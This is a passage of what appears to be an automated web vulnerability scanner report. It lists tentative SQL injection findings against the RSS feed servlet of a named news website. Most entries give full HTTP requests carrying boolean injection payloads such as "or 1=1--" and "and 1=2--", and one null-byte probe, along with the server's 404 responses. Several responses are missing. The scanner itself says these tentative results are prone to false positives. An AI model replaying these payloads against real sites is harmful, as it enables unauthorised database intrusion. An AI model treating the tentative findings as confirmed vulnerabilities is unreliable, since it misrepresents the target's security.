User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:20:34 GMT
Date: Tue, 07 Dec 2010 23:20:34 GMT
Content-Length: 424
Connection: close

<HTML>

<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>

Request 2

GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200782.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.50. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200782.xml [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200782.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 12983011'%20or%201%3d1--%20 and 12983011'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet12983011'%20or%201%3d1--%20/568/200782.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:40 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet12983011'%20or%201%3d2--%20/568/200782.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.51. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200783.xml [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200783.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 13540988'%20or%201%3d1--%20 and 13540988'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi13540988'%20or%201%3d1--%20/rss/CustomRssServlet/568/200783.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

Request 2

GET /mngi13540988'%20or%201%3d2--%20/rss/CustomRssServlet/568/200783.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:20:30 GMT
Date: Tue, 07 Dec 2010 23:20:30 GMT
Content-Length: 424
Connection: close

<HTML>

<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>

1.52. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200783.xml [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200783.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 39771848%20or%201%3d1--%20 and 39771848%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/56839771848%20or%201%3d1--%20/200783.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

Request 2

GET /mngi/rss/CustomRssServlet/56839771848%20or%201%3d2--%20/200783.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.53. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200784.xml [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200784.xml

Issue detail

Request 1

GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200784.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:49 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200784.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:20:50 GMT
Date: Tue, 07 Dec 2010 23:20:50 GMT
Content-Length: 424
Connection: close

<HTML>

<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>

1.54. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200785.xml [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200785.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 14698078'%20or%201%3d1--%20 and 14698078'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi14698078'%20or%201%3d1--%20/rss/CustomRssServlet/568/200785.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:20:45 GMT
Date: Tue, 07 Dec 2010 23:20:45 GMT
Content-Length: 424
Connection: close

<HTML>

<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>

Request 2

GET /mngi14698078'%20or%201%3d2--%20/rss/CustomRssServlet/568/200785.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:45 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.55. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200786.xml [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200786.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 10825379'%20or%201%3d1--%20 and 10825379'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi10825379'%20or%201%3d1--%20/rss/CustomRssServlet/568/200786.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:20:37 GMT
Date: Tue, 07 Dec 2010 23:20:37 GMT
Content-Length: 424
Connection: close

<HTML>

<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>

Request 2

GET /mngi10825379'%20or%201%3d2--%20/rss/CustomRssServlet/568/200786.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.56. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200786.xml [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200786.xml

Issue detail

Request 1

GET /mngi/rss/CustomRssServlet/568%20and%201%3d1--%20/200786.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

Request 2

GET /mngi/rss/CustomRssServlet/568%20and%201%3d2--%20/200786.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:51 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.57. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200789.xml [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200789.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 13847561'%20or%201%3d1--%20 and 13847561'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet13847561'%20or%201%3d1--%20/568/200789.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:46 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet13847561'%20or%201%3d2--%20/568/200789.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.58. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200792.xml [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200792.xml

Issue detail

Request 1

GET /mngi/rss/CustomRssServlet'%20and%201%3d1--%20/568/200792.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

Request 2

GET /mngi/rss/CustomRssServlet'%20and%201%3d2--%20/568/200792.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:03 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.59. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200792.xml [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200792.xml

Issue detail

Request 1

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d1--%20/200792.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:10 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d2--%20/200792.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.60. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200795.xml [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200795.xml

Issue detail

Remediation detail

Request 1

GET /mngi/rss/CustomRssServlet%00'/568/200795.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Date: Tue, 07 Dec 2010 23:21:23 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet%00''/568/200795.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.61. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200795.xml [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200795.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 11124167%20or%201%3d1--%20 and 11124167%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/56811124167%20or%201%3d1--%20/200795.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:27 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet/56811124167%20or%201%3d2--%20/200795.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.62. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200902.xml [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
